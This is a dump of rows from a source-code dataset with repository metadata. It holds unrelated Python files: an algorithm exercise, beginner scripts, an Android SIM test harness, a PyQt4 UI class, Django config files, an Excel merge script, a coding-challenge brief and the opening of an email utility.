blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2
values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313
values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107
values | src_encoding stringclasses 20
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 4 6.02M | extension stringclasses 78
values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
class Solution:
    """LeetCode-style 3Sum solver."""

    def Three_Sum(self, nums):
        """Return all unique triplets in *nums* that sum to zero.

        Sorts *nums* in place, then anchors each candidate first element
        and scans the remainder with two pointers, skipping duplicate
        values so each triplet is reported exactly once.
        """
        # Fewer than three numbers can never form a triplet.
        if not nums or len(nums) < 3:
            return []
        nums.sort()
        count = len(nums)
        triplets = []
        for first in range(count):
            # Sorted input: once the anchor is positive, no remaining
            # triplet can sum to zero.
            if nums[first] > 0:
                return triplets
            # Skip repeated anchor values to avoid duplicate triplets.
            if first > 0 and nums[first] == nums[first - 1]:
                continue
            lo, hi = first + 1, count - 1
            while lo < hi:
                total = nums[first] + nums[lo] + nums[hi]
                if total < 0:
                    lo += 1
                elif total > 0:
                    hi -= 1
                else:
                    triplets.append([nums[first], nums[lo], nums[hi]])
                    # Step both pointers past any duplicates of the pair
                    # just recorded.
                    while lo < hi and nums[lo] == nums[lo + 1]:
                        lo += 1
                    while lo < hi and nums[hi] == nums[hi - 1]:
                        hi -= 1
                    lo += 1
                    hi -= 1
        return triplets
# Quick manual smoke test of the solver.
a = Solution()
print(a.Three_Sum([-1, 0, 1, 2, -1, -4]))
"noreply@github.com"
] | noreply@github.com |
# Teaching script: demonstrates string concatenation, integer addition,
# variables, input() and type casting. Output text is kept exactly as in
# the original so the lesson's expected output is unchanged.
print("Hello" + " " + "World" + " today" " is " + "Thursday")
# this is concatenation (adjacent string literals are also joined)
print("This starts a new line")
print()
print("Tomorrow is Friday")
# if adding strings is called "concatenation"
# what is + for integers called? addition
# 5 + 4 = 9
print("5" + "4")  # concatenation -> "54"
print(5 + 4)  # addition -> 9
firstName = "Visham"
print("my name is " + firstName)
age = 12  # integer: must be cast to str before concatenating
print("my age is " + str(age))
# variable names are case-sensitive: firstName != FirstName
userName = input("What is your name? ")
print("Hey " + userName)
# ask user for their birth year and cast the text to an int for arithmetic
userBirth = int(input("When is your birth year? "))
print("Wow you are " + str(2021-userBirth) + " years old!")
| [
"110142@eesd.org"
] | 110142@eesd.org |
ee28feb673f3427a13e2672a15ccea190aa77ad7 | 420df99ff70cbdd6eac69550d1cc27c5b56c82e7 | /interaction_2sim_lg/N05_2SIM_1094_OCSim1_Sim2Mode_00_IMS.py | aaf431b6f122eadf177855a8018e17c688d54e2a | [] | no_license | JiaoHu0123/Python | 9def966c7190aa2fa103774d040f054159ca4977 | d65e1acb605f212b0f5cd1aef88d77388ffbd973 | refs/heads/master | 2020-06-22T21:57:04.341679 | 2017-06-13T15:07:57 | 2017-06-13T15:07:57 | 94,225,436 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,243 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Created on 2016-8-25
@author: panpan.wei
ScriptName:SLAB_N05_Interaction_2SIM_1094_OpenCloseSim1_Sim2ModeChange_00_IMS.py(IMS)
Function: 1. Close Vice Sim2,Open Vice card SIM2,the main card data card still Sim1
2. Sim1 modechange,Set to default settings
3. loop step1-2
'''
import android
import ConfigParser # get config file data
import os, sys # use for path
import time # use for time
#import re # rename slog name
# define vars
caseTimeOut = 200
config = ConfigParser.ConfigParser()
BASE_DIR = os.path.dirname(__file__) # test scripts path name #get parent path
parent_dir = os.path.split(BASE_DIR)
Par_DIR = parent_dir[0]
# Test parameters are read from Settings.ini in the parent directory.
Setting_path = os.path.join(Par_DIR, 'Settings.ini')
config.readfp(open(Setting_path, 'r'))
# Handle to the device automation framework; all logging goes through it.
droid = android.Android(scriptname=__file__)
basic_path = os.path.abspath(Par_DIR)
droid.log(basic_path)
# Make the shared 'basic' helper package importable from the parent dir.
sys.path.append(basic_path)
import basic.importMethod
basic.importMethod.importMethod()
# Remember the phone's preferred-network mode so it can be restored later.
defaultMode = droid.getCommandReturn("GetNetworkMode")
droid.log("===================defualtMode=" + defaultMode)
from basic import common
from basic import net
from basic import call
droid.setCaseTimeOut(caseTimeOut)
# pass/fail counters updated by ModeChange_EDC() below
passTimes = 0
failTimes = 0
phoneId = 1 # 0-sim1;1-sim2
testTimes = config.get("Setting", "interaction") # get test times
hold_time = config.get("Setting", "callHoldTime")
emcNum = config.get("CallNum", "emc")
droid.log("The test times is " + testTimes)
# Helper objects wrapping network, common and call/MMC operations.
nwObject = net.NetWork(scriptname = __file__)
commObject = common.Common(scriptname = __file__)
callObject=call.MMC(scriptname = __file__)
# NOTE: Python 2 print statements - this script is Python 2 only.
print droid.log("parent path=" + BASE_DIR)
print droid.log("parent_dir=" + Par_DIR)
print droid.log(" =============================signal sim,open close sim card==========================")
defaultModeInt = nwObject.getModeStrToInt(defaultMode)
droid.log("the default mode int is " + str(defaultModeInt))
# Record the software build and script identity for the report, then probe
# the active main card's network class and SIM type. (The original code
# repeated each of these assignments twice in a row with identical results;
# the duplicates added nothing and doubled the device queries.)
version = droid.getCommandReturn("GetSoftwareVersion")
casename = droid.scriptname
cardtype = "DUAL"
sim = callObject.getMainCard(droid)
network = nwObject.getNetClass(droid, sim)
simtype = callObject.getSimType(droid, sim)
droid.log("===sim=" + sim + "===network=" + network + "===simtype=" + simtype)
#==================================================================================
# Verify both SIMs are present and the network/IMS state matches the
# expected dual-SIM "L+G" single-VoLTE configuration before testing.
Status, ResultCause, SIM1Status, SIM2Status, Network1Status, Network2Status = nwObject.CheckCurrentSIMandNWStatus(droid, 2, "MULTI", "L+G", "SingleVolte")
# nwObject.CheckCurrentSIMandNWStatus(droid, expSimNum, expNWMode, expDualMode, expIMSStatus)
# expNWMode, expDualMode
# expSimNum={0,1,2}
# expNWMode={LTE,WCDMA,TDSCDMA,GGE}
# expIMSStatus={DualVolte,SingleVolte,NoVolte}
commObject.summary(droid, "IMS", "MULTI", simtype, "Card Switch", "L+G", "120", SIM1Status, SIM2Status, Network1Status, Network2Status)
# Abort early when the precondition check reports unsupported or failed.
if "NA" in Status:
    droid.log("summary:NOT_SUPPORT")
    exit()
elif "Fail" in Status:
    droid.log("CriticalError: SIM Status ERROR or Network ERROR")
    exit()
else:
    droid.log("Sim Status Is Normal")
#============================================================================================================
defaultMode = droid.getCommandReturn("GetNetworkMode")
droid.log("===================defualtMode=" + defaultMode)
# LTE support is inferred from the preferred-network-mode string.
if "LTE" in defaultMode:
    supportLTE = True
elif "AUTO" in defaultMode:
    droid.log("AUTO MODE")
    supportLTE = True
else:
    supportLTE = False
droid.log("supportLTE=" + str(supportLTE))
# Determine whether the main card is registered on 4G with VoLTE; if not
# but LTE is supported, try switching it to LTE first.
volteFlag = nwObject.checkVolte(droid, sim)
if network == "4G" and volteFlag:
    droid.log("--------4g_ims--------------")
    netvolte = True
elif supportLTE:
    nwObject.startSearchNet(droid, sim)
    nwObject.selLTE(droid, simtype)
    # NOTE(review): volteFlag is refreshed here but netvolte is set True
    # even if the re-check fails - confirm this is intentional.
    volteFlag = nwObject.checkVolte(droid, sim)
    droid.log("--------4g_ims--------------")
    netvolte = True
else:
    netvolte = False
    droid.log("------no_ims--------------")
#====================================================================================
def ReturnMode():
    """Restore the preferred-network mode captured at script start-up.

    Returns True when the framework restores the mode successfully,
    False otherwise. The original body had an orphaned ``else:`` after a
    statement (a syntax error as written) and placed the "pass" log where
    it could never run; logging now happens before each return.
    """
    if nwObject.backDefaultMode(droid, defaultModeInt, sim):
        droid.log("set DefaultMode pass")
        return True
    else:
        droid.log("set DefaultMode fail")
        return False
def CloseSim(sim):
    """Disable the given SIM slot via the network helper.

    Returns True when the framework reports success, False otherwise.
    """
    if nwObject.closeSim(droid, sim):
        return True
    return False
def OpenSim(sim):
    """Enable the given SIM slot via the network helper.

    Returns True when the framework reports success, False otherwise.
    """
    if not nwObject.openSim(droid, sim):
        return False
    return True
def ModeChange_EDC():
    """Run testTimes cycles: with SIM1 as main/data card, close SIM1,
    change the network mode, reopen SIM1 and restore the default mode;
    a cycle passes only when every step reports success.
    """
    global passTimes, failTimes
    for i in range(1, int(testTimes) + 1):
        droid.log("This is the " + str(i) + " times test:")
        # Make SIM1 both the main card and the data card.
        callObject.setMainCard(droid, 0)
        time.sleep(30)
        callObject.setDataCard(droid, 0)
        time.sleep(20)
        closeSim = CloseSim(0)
        time.sleep(40)
        Modechange = nwObject.checkANDSetMode(droid)
        time.sleep(40)
        openSim = OpenSim(0)
        time.sleep(30)
        defaultModeFlag = ReturnMode()
        time.sleep(40)
        # NOTE(review): bitwise '&' is used instead of 'and'; that is fine
        # for plain booleans, but differs if checkANDSetMode() returns an
        # int bitmask - confirm its return type before changing this.
        if Modechange & defaultModeFlag & closeSim & openSim:
            passTimes += 1
        else:
            failTimes += 1
        droid.log("=====================PASS: " + str(passTimes) + "; FAIL: " + str(failTimes))
        # Restore the pre-test card configuration before the next cycle.
        callObject.setPreCondition(droid, 0, 0)
        time.sleep(30)
#============================================================================================================
# Entry point: dispatch on how many SIM cards are inserted. The test only
# runs in the dual-SIM case; every other configuration is NOT_SUPPORT.
if droid.sendCommand("IsPluginSimCard 0", "OK") and droid.sendCommand("IsPluginSimCard 1", "OK"):
    cardtype = "DUAL"
    droid.log("************************************pluginSim two card=================================")
    sim1type = callObject.getSimType(droid, 0)
    net1 = nwObject.getNetClass(droid, 0)
    sim2type = callObject.getSimType(droid, 1)
    net2 = nwObject.getNetClass(droid, 1)
    droid.log("sim1 simtype=" + sim1type + "sim2 simtype=" + sim2type)
    droid.log("sim1 net=" + net1 + "sim2 net=" + net2)
    # Give an out-of-service SIM 20s to register before running the test.
    # NOTE(review): only one SIM is re-checked and the refreshed value is
    # not acted upon - confirm whether a retry/abort was intended here.
    if net1 == "UNKNOW":
        droid.log("main card sim1 no service, wait 20s,check again")
        time.sleep(20)
        net1 = nwObject.getNetClass(droid, 0)
        droid.log("sim1 net=" + str(net1))
    elif net2 == "UNKNOW":
        droid.log("main card sim2 no service, wait 20s,check again")
        time.sleep(20)
        net2 = nwObject.getNetClass(droid, 1)
        droid.log("sim2 net=" + str(net2))
    else:
        droid.log("have service")
    ModeChange_EDC()
elif droid.sendCommand("IsPluginSimCard 0", "OK"):
    cardtype = "SINGLE1"
    droid.log("summary:NOT_SUPPORT")
    exit()
elif droid.sendCommand("IsPluginSimCard 1", "OK"):
    cardtype = "SINGLE2"
    droid.log("summary:NOT_SUPPORT")
    exit()
else:
    droid.log("just plugin one simCard or no simCard")
    network = "NO_NET"
    simtype = "NO_SIM"
    cardtype = "NO_SIM"
    droid.log("summary:NOT_SUPPORT")
    exit()
# Final pass/fail summary written through the common helper.
commObject.result(droid,testTimes, passTimes, failTimes)
| [
"张毅"
] | 张毅 |
d4c5af2c37f2669d2f4c55e79ac64f1d74e26cbd | 840bbdcbc8633b09953262a4bee638b9f1c24def | /Unit 3 Sprint 1 Instructions.py | 1e6ebab7ee3f6bea7098c9b7651981c844d01747 | [
"MIT"
] | permissive | ValerieLangat/DS-Unit-3-Sprint-1-Software-Engineering | 0bde29cd39e6c7aa1f6b7562cf22e1904fc2fb30 | 2e0f3d41d58e5012329a438eef112d8d1f98d035 | refs/heads/master | 2020-06-17T08:38:16.681083 | 2019-07-15T02:25:39 | 2019-07-15T02:25:39 | 195,865,007 | 0 | 0 | null | 2019-07-08T18:21:26 | 2019-07-08T18:21:25 | null | UTF-8 | Python | false | false | 11,128 | py | # Data Science Unit 3 Sprint Challenge 1
## Software Engineering - the Acme Way
In this sprint challenge you will write code and answer questions related to
object-oriented programming, code style/reviews, containers, and testing. You
may use any tools and references you wish, but your final code should reflect
*your* work and be saved in `.py` files (*not* notebooks), and (along with this
file including your written answers) added to your
`DS-Unit-3-Sprint-1-Software-Engineering` repository.
For all your code, you may only import/use the following:
- Other modules you write
- `unittest` (from the standard library)
- `random` (from the standard library)
As always, make sure to manage your time - get a section/question to "good
enough" and then move on to make sure you do everything. You can always revisit
and polish at the end if time allows.
This file is Markdown, so it may be helpful to add/commit/push it first so you
can view it all nice and rendered on GitHub.
Good luck!
### Part 1 - Keeping it Classy
As an employee of Acme Corporation, you're always looking for ways to better
organize the vast quantities and variety of goods your company manages and
sells. Everything Acme sells is considered a `Product`, and must have the
following fields (variables that live "inside" the class):
- `name` (string with no default)
- `price` (integer with default value 10)
- `weight` (integer with default value 20)
- `flammability` (float with default value 0.5)
- `identifier` (integer, automatically generated as a random (uniform) number
anywhere from 1000000 to 9999999, inclusive).
Write a Python `class` to model the above data. Make sure you are *precise* in
your field names and types, and that your class has an `__init__` constructor
method with appropriate defaults (or lack thereof).
*Hint* - `random.randint` should be able to serve your random number needs.
Save the class in `acme.py`, and you can test your code in a Python repl as
follows:
```python
>>> from acme import Product
>>> prod = Product('A Cool Toy')
>>> prod.name
'A Cool Toy'
>>> prod.price
10
>>> prod.weight
20
>>> prod.flammability
0.5
>>> prod.identifier
2812086 # your value will vary
```
### Part 2 - Objects that Go!
The class you wrote in part 1 is nice, but it doesn't *do* anything - that is,
it doesn't have any *methods*. So let's add some! Specifically, add two methods:
- `stealability(self)` - calculates the price divided by the weight, and then
returns a message: if the ratio is less than 0.5 return "Not so stealable...",
if it is greater or equal to 0.5 but less than 1.0 return "Kinda stealable.",
and otherwise return "Very stealable!"
- `explode(self)` - calculates the flammability times the weight, and then
returns a message: if the product is less than 10 return "...fizzle.", if it is
greater or equal to 10 but less than 50 return "...boom!", and otherwise
return "...BABOOM!!"
Save your code, and you can test as follows:
```python
>>> from acme import Product
>>> prod = Product('A Cool Toy')
>>> prod.stealability()
'Kinda stealable.'
>>> prod.explode()
'...boom!'
```
### Part 3 - A Proper Inheritance
Of course, Acme doesn't just sell generic products - it sells all sorts of
special specific things!
Make a subclass of `Product` named `BoxingGlove` that does the following:
- Change the default `weight` to 10 (but leave other defaults unchanged)
- Override the `explode` method to always return "...it's a glove."
- Add a `punch` method that returns "That tickles." if the weight is below 5,
"Hey that hurt!" if the weight is greater or equal to 5 but less than 15, and
"OUCH!" otherwise
Example test run:
```python
>>> from acme import BoxingGlove
>>> glove = BoxingGlove('Punchy the Third')
>>> glove.price
10
>>> glove.weight
10
>>> glove.punch()
'Hey that hurt!'
>>> glove.explode()
"...it's a glove."
```
### Part 4 - Class Report
Now you can represent your inventory - let's use these classes and write an
`acme_report.py` module to generate random products and print a summary of them.
For the purposes of these functions we will only use the `Product` class.
Your module should include two functions:
- `generate_products()` should generate a given number of products (default
30), randomly, and return them as a list
- `inventory_report()` takes a list of products, and prints a "nice" summary
For the purposes of generation, "random" means uniform - all possible values
should vary uniformly across the following possibilities:
- `name` should be a random adjective from `['Awesome', 'Shiny', 'Impressive',
'Portable', 'Improved']` followed by a space and then a random noun from
`['Anvil', 'Catapult' 'Disguise' 'Mousetrap', '???']`, e.g. `'Awesome Anvil'`
and `Portable Catapult'` are both possible
- `price` and `weight` should both be from 5 to 100 (inclusive and independent,
and remember - they're integers!)
- `flammability` should be from 0.0 to 2.5 (floats)
You should implement only depending on `random` from the standard library, your
`Product` class from `acme.py`, and built-in Python functionality.
For the report, you should calculate and print the following values:
- Number of unique product names in the product list
- Average (mean) price, weight, and flammability of listed products
At the bottom of `acme_report.py` you should put the following code:
Following is useful starting code for `acme_report.py`:
```python
#!/usr/bin/env python
from random import randint, sample, uniform
from acme import Product
# Useful to use with random.sample to generate names
ADJECTIVES = ['Awesome', 'Shiny', 'Impressive', 'Portable', 'Improved']
NOUNS = ['Anvil', 'Catapult', 'Disguise', 'Mousetrap', '???']
def generate_products(num_products=30):
products = []
# TODO - your code! Generate and add random products.
return products
def inventory_report(products):
pass # TODO - your code! Loop over the products to calculate the report.
if __name__ == '__main__':
inventory_report(generate_products())
```
The last lines let you test by running `python acme_report.py`. You should see
output like:
```
$ python acme_report.py
ACME CORPORATION OFFICIAL INVENTORY REPORT
Unique product names: 19
Average price: 56.8
Average weight: 54.166666666666664
Average flammability: 1.258097155966675
```
It's OK for the specifics to vary (how you message/format), but it should output
and clearly identify all four relevant numbers.
### Part 5 - Measure twice, Test once
Make a file `acme_test.py` starting from the following code:
```python
#!/usr/bin/env python
import unittest
from acme import Product
from acme_report import generate_products, ADJECTIVES, NOUNS
class AcmeProductTests(unittest.TestCase):
"""Making sure Acme products are the tops!"""
def test_default_product_price(self):
"""Test default product price being 10."""
prod = Product('Test Product')
self.assertEqual(prod.price, 10)
if __name__ == '__main__':
unittest.main()
```
If you run the tests you should see output like:
```
$ python acme_test.py
.
----------------------------------------------------------------------
Ran 1 test in 0.000s
OK
```
Complete the following:
- Add at least *2* more test methods to `AcmeProductTests` for the base
`Product` class: at least 1 that tests default values (as shown), and one that
builds an object with different values and ensures their `stealability()` and
`explode()` methods function as they should
- Write a new test class `AcmeReportTests` with at least 2 test methods:
`test_default_num_products` which checks that it really does receive a list of
length 30, and `test_legal_names` which checks that the generated names for a
default batch of products are all valid possible names to generate (adjective,
space, noun, from the lists of possible words)
*Hint* - `test_legal_names` is the trickiest of these, but may not be as bad as
you think. Check out `assertIn` from `unittest`, and remember that Python is
pretty handy at string processing. But if you get stuck, move on and revisit.
Note that `inventory_report()` is pretty tricky to test, because it doesn't
*return* anything - it just prints (a "side-effect"). For the purposes of this
challenge, don't worry about testing it - but as a stretch goal/something to
think about, it's a good ponderer.
### Part 6 - Style it Up
If you did the earlier parts in an editor that was linting your code (warning
you about violations of [PEP8 style](https://pep8.org/)) and you listened to it,
you're already done!
If not, go back and fix things! If you don't have a built-in tool for checking,
you can use [PEP8 online](http://pep8online.com/).
Go for lint-free! If there's a stubborn warning or two you can't fix though,
it's okay to leave a comment explaining it and move on.
### Part 7 - Questions (and your Answers)
Acme Corporation isn't just a few `.py` files. If you want to grow in your
career here, you'll have to answer the following:
- What, in your opinion, is an important part of code reviews? That is, what is
something you pay attention to when you review code, and that you appreciate
when others do the same for your code?
- We have an awful lot of computers here, and it gets pretty confusing with
slightly different things running on all of them. How could containers help us
improve this situation?
Answer both of these questions (baseline ~5 sentences) here in text.
One of the more obvious benefits of a code review - and what I'd consider the
most important - is ensuring your code is decipherable. Whether someone's code is pristine
and runs perfectly or it's completely inaccurate, it doesn't matter if no one can
interpret what your goals were with what was written. Something I pay attention
to is whether or not I'd have a clue what the goals of the code were if I had
little exposure the initial problem. I appreciate when people give me more concise
ways to write my code.
With everyone running different programs and program versions on their computer
at all times, it's important to create an environment that runs all code using
set programs and versions that stay the same no matter the machine it's running
on. This helps streamline and avoid unnecessary errors and confusion.
### Part 8 - Turn it in!
Add all the files you wrote (`acme.py`, `acme_report.py`, and `acme_test.py`),
as well as *this* file with your answers to part 7, to your weekly repo
(`DS-Unit-3-Sprint-1-Software-Engineering`). Commit, push, and await feedback
from Acme Corporation management. Thanks for your hard work!
*Bonus!* Got this far? Read up on the [history of the fine Acme
Corporation](https://en.wikipedia.org/wiki/Acme_Corporation), with decades of
quality products and many satisfied customers (mostly coyotes). | [
"noreply@github.com"
] | noreply@github.com |
# Simple moderation check: only users outside the ban list may post.
banned_user = ['andrew', 'carolina', 'david']
user = 'marie'
if user not in banned_user:
    print(user.title() + ', you can post a response if you wish.')
| [
"jzs1996@sjtu.edu.cn"
] | jzs1996@sjtu.edu.cn |
6f9911154177eaa30d01ec8ca1ffa5a01d3d3ad4 | fa89502d32c5746555836bbf018292a6d69b7272 | /UI/Show2DWindow.py | 43cd11dfb0299b754f07d2530882b404ec15a098 | [] | no_license | mag420/ArchToCE | 7f7632ae184f151439e98780e2589541c8527706 | 9aff999f70645ea5c19e3821560e59f3d97d34fe | refs/heads/master | 2021-03-12T05:13:43.764073 | 2020-03-16T11:30:39 | 2020-03-16T11:30:39 | 246,592,210 | 0 | 0 | null | 2020-03-11T14:23:18 | 2020-03-11T14:23:18 | null | UTF-8 | Python | false | false | 4,549 | py | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'Show2DWindowMod.ui'
#
# Created by: PyQt4 UI code generator 4.11.4
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
# Compatibility shims emitted by pyuic4: on PyQt4 builds without
# QString.fromUtf8 or QApplication.UnicodeUTF8 (API v2 / newer Qt),
# fall back to plain pass-through implementations.
try:
    _fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
    def _fromUtf8(s):
        # API v2: strings are already unicode, return unchanged.
        return s
try:
    _encoding = QtGui.QApplication.UnicodeUTF8
    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
    def _translate(context, text, disambig):
        # Newer API: translate() no longer takes an encoding argument.
        return QtGui.QApplication.translate(context, text, disambig)
class Ui_MainWindow(object):
    """Qt Designer UI for the 2D viewer main window.

    Auto-generated by pyuic4 from Show2DWindowMod.ui - regenerate from the
    .ui file rather than editing by hand (see the header warning).
    """
    def setupUi(self, MainWindow):
        """Create, position and name all widgets on *MainWindow*."""
        MainWindow.setObjectName(_fromUtf8("MainWindow"))
        MainWindow.resize(845, 679)
        # central widget hosting every control below
        self.centralwidget = QtGui.QWidget(MainWindow)
        self.centralwidget.setObjectName(_fromUtf8("centralwidget"))
        self.loadFile = QtGui.QPushButton(self.centralwidget)
        self.loadFile.setGeometry(QtCore.QRect(630, 20, 96, 32))
        self.loadFile.setObjectName(_fromUtf8("loadFile"))
        self.listView = QtGui.QListView(self.centralwidget)
        self.listView.setGeometry(QtCore.QRect(590, 140, 181, 331))
        self.listView.setObjectName(_fromUtf8("listView"))
        self.selectedFileLabel = QtGui.QLabel(self.centralwidget)
        self.selectedFileLabel.setGeometry(QtCore.QRect(630, 70, 111, 20))
        self.selectedFileLabel.setObjectName(_fromUtf8("selectedFileLabel"))
        self.viewsLabel = QtGui.QLabel(self.centralwidget)
        self.viewsLabel.setGeometry(QtCore.QRect(660, 110, 41, 20))
        self.viewsLabel.setObjectName(_fromUtf8("viewsLabel"))
        self.showLower = QtGui.QPushButton(self.centralwidget)
        self.showLower.setGeometry(QtCore.QRect(620, 490, 111, 32))
        self.showLower.setObjectName(_fromUtf8("showLower"))
        # tab widget with two pages
        self.tabWidget = QtGui.QTabWidget(self.centralwidget)
        self.tabWidget.setGeometry(QtCore.QRect(20, 10, 541, 521))
        self.tabWidget.setObjectName(_fromUtf8("tabWidget"))
        self.tab = QtGui.QWidget()
        self.tab.setObjectName(_fromUtf8("tab"))
        self.tabWidget.addTab(self.tab, _fromUtf8(""))
        self.tab_2 = QtGui.QWidget()
        self.tab_2.setObjectName(_fromUtf8("tab_2"))
        self.tabWidget.addTab(self.tab_2, _fromUtf8(""))
        # push buttons along the bottom row
        self.sol2 = QtGui.QPushButton(self.centralwidget)
        self.sol2.setGeometry(QtCore.QRect(150, 550, 111, 32))
        self.sol2.setObjectName(_fromUtf8("sol2"))
        self.sol1 = QtGui.QPushButton(self.centralwidget)
        self.sol1.setGeometry(QtCore.QRect(10, 550, 111, 32))
        self.sol1.setObjectName(_fromUtf8("sol1"))
        self.merge = QtGui.QPushButton(self.centralwidget)
        self.merge.setGeometry(QtCore.QRect(300, 550, 111, 32))
        self.merge.setObjectName(_fromUtf8("merge"))
        self.cross = QtGui.QPushButton(self.centralwidget)
        self.cross.setGeometry(QtCore.QRect(450, 550, 111, 32))
        self.cross.setObjectName(_fromUtf8("cross"))
        MainWindow.setCentralWidget(self.centralwidget)
        # menu bar and status bar
        self.menubar = QtGui.QMenuBar(MainWindow)
        self.menubar.setGeometry(QtCore.QRect(0, 0, 845, 28))
        self.menubar.setObjectName(_fromUtf8("menubar"))
        MainWindow.setMenuBar(self.menubar)
        self.statusbar = QtGui.QStatusBar(MainWindow)
        self.statusbar.setObjectName(_fromUtf8("statusbar"))
        MainWindow.setStatusBar(self.statusbar)
        self.retranslateUi(MainWindow)
        QtCore.QMetaObject.connectSlotsByName(MainWindow)
    def retranslateUi(self, MainWindow):
        """Set all user-visible widget texts (translation hook)."""
        MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow", None))
        self.loadFile.setText(_translate("MainWindow", "Load file", None))
        self.selectedFileLabel.setText(_translate("MainWindow", "No file selected", None))
        self.viewsLabel.setText(_translate("MainWindow", "Views", None))
        self.showLower.setText(_translate("MainWindow", "showLower", None))
        self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab), _translate("MainWindow", "Tab 1", None))
        self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_2), _translate("MainWindow", "Tab 2", None))
        self.sol2.setText(_translate("MainWindow", "Solution2", None))
        self.sol1.setText(_translate("MainWindow", "Solution1", None))
        self.merge.setText(_translate("MainWindow", "GA", None))
        self.cross.setText(_translate("MainWindow", "Cross", None))
| [
"bourahla.yasser@gmail.com"
] | bourahla.yasser@gmail.com |
"""
WSGI config for Teacher project.

It exposes the WSGI callable as a module-level variable named ``application``.

For more information on this file, see
https://docs.djangoproject.com/en/1.10/howto/deployment/wsgi/
"""

import os

from django.core.wsgi import get_wsgi_application

# Point Django at this project's settings before building the WSGI app
# (setdefault keeps any value already supplied by the environment).
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "Teacher.settings")

# Module-level WSGI entry point picked up by servers (gunicorn, mod_wsgi).
application = get_wsgi_application()
| [
"18920354189@163.com"
] | 18920354189@163.com |
bc84cec17b622273a208aaf0e2d3b9dfa807cb13 | 15df2e222af65e5b66183cf02e88e1a33a9cdde0 | /demo01/demo01/urls.py | 6e1e6756e59a59ce0436dee134f5b4770cda067f | [] | no_license | lukeddy/django_train | c45fbdbc24f446722a46e8801183a04e5f8b0bc2 | 5a333c767eeac53817f6deafbbba4b4fc2917c27 | refs/heads/master | 2021-05-28T07:09:22.458218 | 2014-10-12T15:07:19 | 2014-10-12T15:07:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,134 | py | from django.conf.urls import patterns, include, url
from django.contrib import admin
# Django 1.x URLconf: maps /blog/... paths to views referenced by dotted
# string path (the pre-1.10 'patterns' style).
urlpatterns = patterns('',
    # Examples:
    # url(r'^$', 'demo01.views.home', name='home'),
    # url(r'^blog/', include('blog.urls')),
    # url(r'^admin/', include(admin.site.urls)),
    url(r'^blog/index/$', 'blog.views.index'),
    url(r'^blog/category/$', 'blog.views.category'),
    url(r'^blog/detail/$', 'blog.views.detail'),
    url(r'^blog/detail3/$', 'blog.views.detail3'),
    # CRUD demo views (blog.views)
    url(r'^blog/insert/$', 'blog.views.insert'),
    url(r'^blog/list/$', 'blog.views.list_emps'),
    # many-to-one relation demos (blog.views)
    url(r'^blog/many2one_add/$', 'blog.views.test_add'),
    url(r'^blog/many2one_add2/$', 'blog.views.test_add2'),
    url(r'^blog/many2one_add3/$', 'blog.views.test_add3'),
    url(r'^blog/many2one_find/$', 'blog.views.test_find'),
    # many-to-many relation demos (blog.views2)
    url(r'^blog/many2many_test/$', 'blog.views2.test'),
    url(r'^blog/many2many_add/$', 'blog.views2.add'),
    url(r'^blog/many2many_find/$', 'blog.views2.find'),
    url(r'^blog/many2many_update/$', 'blog.views2.update'),
    url(r'^blog/many2many_del/$', 'blog.views2.delete'),
)
| [
"tzq618766@gmail.com"
] | tzq618766@gmail.com |
# Concatenate the ten per-draft-position Excel workbooks into one sheet.
import os

import pandas as pd

# Folder holding the per-position workbooks produced earlier.
os.chdir(r'C:\Users\Kay\Desktop\Data Projects\DraftPick')

# Workbooks are named Modern_Draft_Position_1.xlsx ... _10.xlsx.
excel_names = ["Modern_Draft_Position_" + str(i) + ".xlsx" for i in range(1, 11)]
excels = [pd.ExcelFile(name) for name in excel_names]

# Parse the first sheet of each workbook with no header or index column.
frames = [x.parse(x.sheet_names[0], header=None, index_col=None) for x in excels]

# The first two rows of every workbook after the first are dropped -
# presumably repeated header rows; confirm against the source sheets.
frames[1:] = [df[2:] for df in frames[1:]]

combined = pd.concat(frames)
combined.to_excel("Modern_Draft_Position_All.xlsx", header=False, index=False)
"47289165+KayZhang34@users.noreply.github.com"
] | 47289165+KayZhang34@users.noreply.github.com |
1552891fd5e41a6a25834128ebd14c2019432926 | b46fe4bdfa289b521ed04761a525a8717fc58aa0 | /src/mainpackage/EmailUtil.py | 5df89339f80659103c8c08e5a28ee6919e4db4c3 | [] | no_license | alagarp/python-diskchecker-unix | 3452034aca1d0f45339c339e36505eb3ccd6e214 | a9f2f5d741e55f26f20c09f246f6300e0a6f2a9c | refs/heads/master | 2020-12-25T02:50:11.109348 | 2015-01-28T14:56:41 | 2015-01-28T14:56:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 873 | py | '''
Created on Sep 18, 2013
@author: panshul
'''
import smtplib
from email.mime.text import MIMEText
# Gmail SMTP credentials; 'username' is also used as the From: address.
# NOTE(review): plaintext credentials in source control are a security
# risk - consider loading these from the environment or a config file.
username="username@domain.com"
password="guessme"
def prepareMessage(dsf,recipients,machine):
    """Build the low-disk-space alert as a MIMEText message.

    dsf        -- disk stats sequence: (total, used, free), in GB
    recipients -- list of recipient e-mail addresses
    machine    -- name of the host whose disk is filling up

    Returns an email.mime.text.MIMEText ready to be sent. The From:
    address comes from the module-level 'username'.
